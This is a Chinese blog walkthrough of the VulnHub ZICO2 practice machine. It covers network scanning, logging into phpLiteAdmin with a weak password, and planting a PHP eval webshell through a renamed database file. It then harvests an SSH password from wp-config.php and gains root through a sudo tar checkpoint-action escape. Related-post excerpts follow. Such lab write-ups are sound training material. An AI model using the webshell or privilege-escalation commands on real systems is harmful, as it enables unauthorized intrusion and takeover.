ZICO2: 1 (权限提升)

于 2024-09-19 08:00:00 发布
阅读量427 收藏 9
点赞数 5
文章标签: 数据库 安全
阿迪
本文链接:https://blog.csdn.net/2201_75569982/article/details/142342319
版权

靶机下载地址:

https://vulnhub.com/entry/zico2-1,210/

虚拟机配置

这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击zico2靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可

收集信息

通过arp协议扫描局域网,又快又准,但是只能扫描局域网内的ip。

arp-scan -l

发现靶机的IP地址为 `192.168.134.157,然后用nmap对靶机进行详细地扫描。

nmap -A -sV -p- --min-parallelism 100 192.168.134.157

靶机开放了80端口,111端口和53953端口,查一下发现111可能存在漏洞,但是这个漏洞只能使目标主机崩溃,所以没有过多研究。然后继续扫描目录。

dirsearch -u 192.168.134.157

获取SHELL

点php

发现了一个登陆页面,随便输入一个密码,一不小心就进了管理页面。

经过一番捣鼓,最终发现这个后台可以写入webshell。首先随便创建一个数据库。

随便设置一个字段名称,类型为TEXT

在表中写一句话木马

<?php @eval($_POST["b"]);?>

此时还无法访问到该一句话木马,因为数据库文件的默认存放位置是 /usr/databases/,在该目录中的文件是无法直接访问到的,所以我们需要通过改名来移动文件到可以访问的位置。

访问 http://192.168.134.157/dbadmin/,发现b.php已经存在这个目录中了。

然后通过蚁剑就可以连接到该一句话木马。

提权

获取shell尝试一下suid提权,没有成功。然后去查找靶机中有没有存在敏感信息。最终在家目录中wordpress中的配置文件wp-config.php中找到了zico账号和密码 sWfCsfJSPV9H3AmQzw8

尝试用ssh登陆,成功连接上了。

ssh zico@192.168.134.157

尝试各种提权方法,最终发现可以通过sudo提权。可以通过具有root权限的tar和zip来提权。

sudo -l

通过tar提权:

echo "/bin/bash" > shell.sh
sudo tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=sh shell.sh

最后提权成功

Ad
关注
靶场渗透(五)——zico2渗透
Ramona的博客
08-10 618
测试环境 靶机:cizo2打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描ip,端口和服务,根据扫描结果可得 ip:192.168.111.138 端口及服务:22 ssh;80 http;111 渗透测试 • 访问网站,查看源码也没发现有价值的线索,爆破目录发现了敏感目录dbadmin且存在遍历漏洞 • 访问test_d...
vulnhub zico2 靶场练习
鸥鹭忘机
12-22 3635
前言 这次练习的靶机是vulnhub平台的zico2。下载地址为:https://www.vulnhub.com/entry/zico2-1,210/。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击zico2靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 收集信息 通过arp协议扫描局域网,又快又准,但是只能扫描局域网内的ip。 arp-scan -l 发现靶机的IP地址为 `192.168.
VulnHub渗透测试实战靶场 - ZICO2: 1
LYJ20010728的博客
08-07 778
VulnHub渗透测试实战靶场 - ZICO2: 1环境下载ZICO2: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权补充 环境下载 戳此进行环境下载 ZICO2: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 渗透测试 信息搜集 先用arp-scan扫描一下网段内目标靶机的IP地址
zico2靶机
薛定谔嘚喵博客
03-19 414
文件包含,远程php代码执行漏洞,一句话木马
靶机实战(zico2)
weixin_45605313的博客
05-31 677
zico2实验环境实验过程信息收集主机发现端口扫描网站指纹目录扫描漏洞发现漏洞利用 实验环境 靶机:zico2 测试机: win10 ,kali 实验过程 信息收集 主机发现 靶机IP:192.168.238.156 端口扫描 网站指纹 目录扫描 网站主页 漏洞发现 数据库登录口(弱口令爆破,sql注入,逻辑漏洞等) 密码:admin 进到了数据库 先看到两个用户尝试解密 root:34kroot34 zico:zico2215@ 登陆下ssh(登不进去) searchsploit扫到
VMware的Zico2虚拟机
05-12
在IT行业中,虚拟化技术如VMware的Zico2,已经成为提升效率、降低成本和简化IT管理的重要工具。 首先,我们需要了解VMware Workstation或vSphere这样的虚拟化平台。VMware Workstation是一款在个人计算机上运行的...
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
靶机zico2练习:数据库插入反弹语句获取shell,脏牛提权,清除痕迹,留后门
7Riven's blog
01-29 940
1.主机发现 2.端口扫描 3.目录扫描 4.端口访问 尝试一下,含有文件包含漏洞 5.访问扫描出来的目录 发现登录端口,需要输入密码 尝试弱口令admin登录成功 信息查询,发现用户名、密码 md5解密试试,root用户密码为:34kroot34 zico用户密码为:zico2215@ 由于存在ssh服务端口,尝试连接 ...
渗透测试实战5——zico2靶机入侵
浅浅的博客
04-25 1459
一、实验环境 攻击机(Kali):192.168.247.156 靶机(Node):192.168.247.154 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 目标靶机开放22、80、111、50309端口 3、服务版本信息 (二)端口探测 80端口 1、目录探测 分别使用默认字典和大字典对靶机进行目录探测,探测结果如下: 2、访问...
zico2靶机练习
SYJ_361的博客
03-27 2977
本文是对zico2靶机的练习,通过kali和御剑等工具对靶机进行信息收集,利用phpLiteAdmin漏洞,并利用文件包含漏洞上传文件,用蚁剑连接,并通过kali进行反弹shell,最后用ssh登录,对靶机进行提权,并找到flag文件
Vulnhub靶场练习 DC-1
m0_64227134的博客
04-23 550
Vulnhub 靶场练习 DC-1
(Vulnhub练习)-- Zico2渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-21 493
(Vulnhub练习)-- Zico2渗透实战 Zico2渗透实战 下载地址 http://www.vulnhub.com/entry/zico2-1,210/ 此文章是参照大佬橘子女侠的文章写的 以下为我跟着他的文章整理的笔记 主机发现 sudo netdiscover -i eth0 -r 192.168.100.0/24 目标主机IP:192.168.100.153 端口扫描 sudo nmap -A 192.168.100.153 指纹识别 whatweb 192.168.100.153
Vulnhub-Zico2靶机实战
御七彩虹猫
03-24 3234
Vulnhub-Zico2靶机实战
Vulnhub靶场渗透练习(一) Breach1.0
深蓝旭的博客
08-24 445
打开靶场 固定ip需要更改虚拟机为仅主机模式192.168.110.140 打开网页http://192.168.110.140/index.html 查看源代码发现可以加密字符串 猜测base64 解密cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh 得到这个结果可能是二次加密在base64解密 得到pgibbons:damnitfeel$goodtobeagang$ta 去除: 得到两个字符串pgibbons,dam...
【vulnhub靶场】Zico 2靶机提权
最新发布
qq_46421742的博客
08-01 285
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
vulnhub DC4 靶场练习
鸥鹭忘机
08-16 651
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第四台,下载地址为https://www.vulnhub.com/entry/dc-4,313/。该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-4靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 然后需要溢出CD/DVD选项,这个启动时候会自动检测并连接
Vulnhub靶场渗透-zico2
paidx0
10-01 1284
前言 靶机ip(192.168.110.128) 攻击机ip(192.168.110.127) 网络NAT模式 这段时间一直在忙别的事,有两个礼拜没有学习了,哈哈哈 信息收集 打开网站每个页面都简单看了看,发现一个很明显的LFI,先记录下来肯定能用上 继续看就没有什么东西了,网页功能也比较简单,现在再来扫一下目录 很明显是数据库,手试了一波弱口令给我进去了,就是admin 漏洞挖掘 简单说一下 phpliteadmin 其实就是一个类似于 phpmyadmin的一个数据库管理工具 注意他的版本,
关于 Apache 常见安全漏洞 --vulhub靶场练习
m0_60742333的博客
03-23 1598
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。以下实验环境皆来自于vulhub实验靶场,如下图示例,下载好vulhub环境进入要测试的漏洞文件夹,使用docker-compose up -d 命令开启实验。7. 将请求方式修改成POST,然后在请求体写入echo,并将数据包放行即可,使用bash进行反弹shell。后缀进行解析,导致绕过一些服务器的安全策略。
Zico2靶机渗透测试实战指南
在实际渗透测试中,这可能涉及利用目录遍历、文件路径注入等技术,以获取服务器内部信息或权限提升。 这个Zico2渗透实战教程涵盖了渗透测试的基本流程,包括环境配置、信息收集和漏洞利用,为学习者提供了一个实践...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值